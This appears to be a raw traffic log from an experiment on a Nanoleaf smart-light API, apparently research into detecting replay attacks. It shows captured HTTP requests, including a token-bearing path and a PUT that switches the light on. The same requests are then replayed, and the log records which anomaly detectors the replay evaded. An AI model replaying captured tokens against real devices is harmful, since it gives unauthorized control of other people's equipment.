GET /api/v1/None HTTP/1.1
Host: 10.11.0.41:16021
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


GET /api/v1/None HTTP/1.1
Host: 10.11.0.41:16021
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


HTTP/1.1 401 Unauthorized
Content-Length: 0


HTTP/1.1 401 Unauthorized
Content-Length: 0


GET /api/v1/ HTTP/1.1
Host: 10.11.0.41:16021
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


HTTP/1.1 401 Unauthorized
Content-Length: 0


GET /api/v1/zOzrHbxQQ49zJ1ydjw6ErSZOHN3nOYOO HTTP/1.1
Host: 10.11.0.41:16021
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


HTTP/1.1 200 OK
Content-Length: 908
Content-Type: application/json

{"name":"Shapes 9CA8","serialNo":"S21170H8418","manufacturer":"Nanoleaf","firmwareVersion":"7.1.6","hardwareVersion":"1.4-0","model":"NL42","discovery":{},"effects":{"effectsList":["Beatdrop","Blaze","Cocoa Beach","Cotton Candy","Date Night","Hip Hop","Hot Sauce","Jungle","Lightscape","Morning Sky","Northern Lights","Playful Pink","Pop Rocks","Prism","Starlight","Sundown","Waterfall"],"select":"Playful Pink"},"firmwareUpgrade":{},"panelLayout":{"globalOrientation":{"value":60,"max":360,"min":0},"layout":{"numPanels":2,"sideLength":134,"positionData":[{"panelId":54859,"x":0,"y":6,"o":0,"shapeType":8},{"panelId":0,"x":25,"y":60,"o":300,"shapeType":12}]}},"qkihnokomhartlnp":{},"schedules":{},"state":{"brightness":{"value":90,"max":100,"min":0},"colorMode":"effect","ct":{"value":3000,"max":6500,"min":1200},"hue":{"value":0,"max":360,"min":0},"on":{"value":false},"sat":{"value":0,"max":100,"min":0}}}
PUT /api/v1/zOzrHbxQQ49zJ1ydjw6ErSZOHN3nOYOO/state HTTP/1.1
Host: 10.11.0.41:16021
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 23


{"on": {"value": true}}
HTTP/1.1 204 No Content
Content-Length: 0


START REPLAY ATTACK
#######################################################################################
sent payload=PUT /api/v1/zOzrHbxQQ49zJ1ydjw6ErSZOHN3nOYOO/state HTTP/1.1
Host: 10.11.0.41:16021
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 23

{"on": {"value": true}}
****************************************************************
received payload=HTTP/1.1 204 No Content
Content-Length: 0


****************************************************************
sent payload=GET /api/v1/zOzrHbxQQ49zJ1ydjw6ErSZOHN3nOYOO HTTP/1.1
Host: 10.11.0.41:16021
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


****************************************************************
received payload=HTTP/1.1 200 OK
Content-Length: 907
Content-Type: application/json

{"name":"Shapes 9CA8","serialNo":"S21170H8418","manufacturer":"Nanoleaf","firmwareVersion":"7.1.6","hardwareVersion":"1.4-0","model":"NL42","discovery":{},"effects":{"effectsList":["Beatdrop","Blaze","Cocoa Beach","Cotton Candy","Date Night","Hip Hop","Hot Sauce","Jungle","Lightscape","Morning Sky","Northern Lights","Playful Pink","Pop Rocks","Prism","Starlight","Sundown","Waterfall"],"select":"Playful Pink"},"firmwareUpgrade":{},"panelLayout":{"globalOrientation":{"value":60,"max":360,"min":0},"layout":{"numPanels":2,"sideLength":134,"positionData":[{"panelId":54859,"x":0,"y":6,"o":0,"shapeType":8},{"panelId":0,"x":25,"y":60,"o":300,"shapeType":12}]}},"qkihnokomhartlnp":{},"schedules":{},"state":{"brightness":{"value":90,"max":100,"min":0},"colorMode":"effect","ct":{"value":3000,"max":6500,"min":1200},"hue":{"value":0,"max":360,"min":0},"on":{"value":true},"sat":{"value":0,"max":100,"min":0}}}
****************************************************************
sent payload=GET /api/v1/ HTTP/1.1
Host: 10.11.0.41:16021
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


****************************************************************
received payload=HTTP/1.1 401 Unauthorized
Content-Length: 0


****************************************************************
sent payload=GET /api/v1/None HTTP/1.1
Host: 10.11.0.41:16021
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

GET /api/v1/None HTTP/1.1
Host: 10.11.0.41:16021
User-Agent: python-requests/2.25.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


****************************************************************
received payload=HTTP/1.1 401 Unauthorized
Content-Length: 0


****************************************************************
REPLAY ATTACK NOT SUCCESSFUL WITH CLF=OneClassSVM(gamma='auto', nu=0.001)
REPLAY ATTACK SUCCESSFUL WITH CLF=IsolationForest(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=EllipticEnvelope(contamination=0.01)
REPLAY ATTACK SUCCESSFUL WITH CLF=LocalOutlierFactor(contamination=0.01, novelty=True)
REPLAY ATTACK SUCCESSFUL WITH CLF=CustomClassifier()
END REPLAY ATTACK
